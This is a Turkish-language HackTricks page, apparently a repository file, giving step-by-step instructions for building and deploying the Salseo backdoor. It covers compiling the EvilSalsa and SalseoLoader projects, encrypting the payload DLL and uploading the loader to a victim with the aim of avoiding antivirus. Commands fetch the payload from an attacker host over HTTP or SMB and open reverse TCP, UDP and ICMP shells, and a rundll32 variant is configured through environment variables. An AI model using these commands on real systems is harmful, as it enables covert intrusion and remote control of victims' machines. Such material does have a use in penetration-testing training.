hacktricks/backdoors/salseo.md

8 KiB
Raw Blame History

Salseo

{% hint style="success" %} AWS Hacking'ı öğrenin ve uygulayın: HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)
GCP Hacking'i öğrenin ve uygulayın: HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)

HackTricks'i Destekleyin
{% endhint %}

Derlemeleri Oluşturma

Kaynak kodunu github'dan indirin ve EvilSalsa ve SalseoLoader'ı derleyin. Kodu derlemek için Visual Studio'nun yüklü olması gerekmektedir.

Bu projeleri, kullanacak olduğunuz Windows işletim sisteminin mimarisi için derleyin (Windows x64'ü destekliyorsa, bu mimari için derleyin).

Mimarisi Visual Studio içinde "Platform Target" altında sol "Build" Sekmesinde seçebilirsiniz.

(**Bu seçenekleri bulamazsanız, "Project Tab" üzerine tıklayın ve ardından **"<Project Name> Özellikleri"**ne tıklayın)

Daha sonra, her iki projeyi de derleyin (Build -> Build Solution) (Log içinde yürütülebilir dosyanın yolunu göreceksiniz):

Arka Kapıyı Hazırlama

Öncelikle, EvilSalsa.dll'yi kodlamalısınız. Bunu yapmak için encrypterassembly.py adlı python betiğini kullanabilir veya EncrypterAssembly projesini derleyebilirsiniz:

Python

python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt

Windows

EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt

Şimdi Salseo işlemini gerçekleştirmek için ihtiyacınız olan her şeye sahipsiniz: şifrelenmiş EvilDalsa.dll ve SalseoLoader'ın ikili dosyası.

SalseoLoader.exe ikili dosyasını makineye yükleyin. Herhangi bir AV tarafından tespit edilmemeleri gerekiyor...

Arka kapıyı çalıştırın

TCP ters kabuk almak (şifrelenmiş dll'yi HTTP üzerinden indirme)

Ters kabuk dinleyici olarak nc'yi başlatmayı ve şifrelenmiş evilsalsa'yı sunmak için bir HTTP sunucusu başlatmayı unutmayın.

SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>

Bir UDP ters kabuk almak (SMB üzerinden kodlanmış dll indirme)

Ters kabuk dinleyici olarak nc'yi başlatmayı ve kodlanmış evilsalsa'yı sunmak için bir SMB sunucusu başlatmayı unutmayın (impacket-smbserver).

SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>

ICMP ters kabuk almak (şifrelenmiş dll zaten kurbanın içinde)

Bu sefer ters kabuk almak için istemci tarafında özel bir araca ihtiyacınız var. İndirin: https://github.com/inquisb/icmpsh

ICMP Yanıtlarını Devre Dışı Bırakın:

sysctl -w net.ipv4.icmp_echo_ignore_all=1

#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0

İstemciyi çalıştırın:

python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"

Kurbanın içinde, salseo şeyini çalıştıralım:

SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>

Ana işlevi dışa aktaran DLL olarak SalseoLoader'ı derleme

Visual Studio kullanarak SalseoLoader projesini açın.

Ana işlevden önce ekle: [DllExport]

Bu projeye DllExport yükleyin

Araçlar --> NuGet Paket Yöneticisi --> Çözüm İçin NuGet Paketlerini Yönet...

DllExport paketini arayın (Gözat sekmesini kullanarak) ve Yükle'yi seçin (ve açılan pencereyi kabul edin)

Projeler klasörünüzde DllExport.bat ve DllExport_Configure.bat dosyaları görünmelidir.

DllExport'u kaldırın

Kaldır'ı seçin (evet, tuhaf ama bana güvenin, gerekli)

Visual Studio'yu kapatın ve DllExport_configure'ı çalıştırın

Sadece çıkın Visual Studio'dan

Ardından, SalseoLoader klasörüne gidin ve DllExport_Configure.bat'ı çalıştırın

x64'ü seçin (eğer x64 kutusunda kullanacaksanız, benim durumumda olduğu gibi), System.Runtime.InteropServices'ı seçin (DllExport için Namespace içinde) ve Uygula'yı seçin

Projeyi tekrar Visual Studio ile açın

[DllExport] artık hata olarak işaretlenmemelidir

Çözümü derleyin

Çıkış Türü = Sınıf Kitaplığı seçin (Proje --> SalseoLoader Özellikleri --> Uygulama --> Çıkış türü = Sınıf Kitaplığı)

x64 platformunu seçin (Proje --> SalseoLoader Özellikleri --> Derleme --> Platform hedefi = x64)

Çözümü derlemek için: Derle --> Çözümü Derle (Çıktı konsolunda yeni DLL'nin yolu görünecektir)

Oluşturulan Dll'yi test edin

Dll'yi test etmek istediğiniz yere kopyalayın ve yapıştırın.

Çalıştır:

rundll32.exe SalseoLoader.dll,main

Eğer hata görünmüyorsa, muhtemelen işlevsel bir DLL'niz var!!

DLL kullanarak bir kabuk alın

Bir HTTP sunucusu kullanmayı ve bir nc dinleyici ayarlamayı unutmayın

Powershell

$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main

CMD

CMD

set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main

{% hint style="success" %} AWS Hacking'ı öğrenin ve uygulayın: HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)
GCP Hacking'ı öğrenin ve uygulayın: HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)

HackTricks'i Destekleyin
{% endhint %}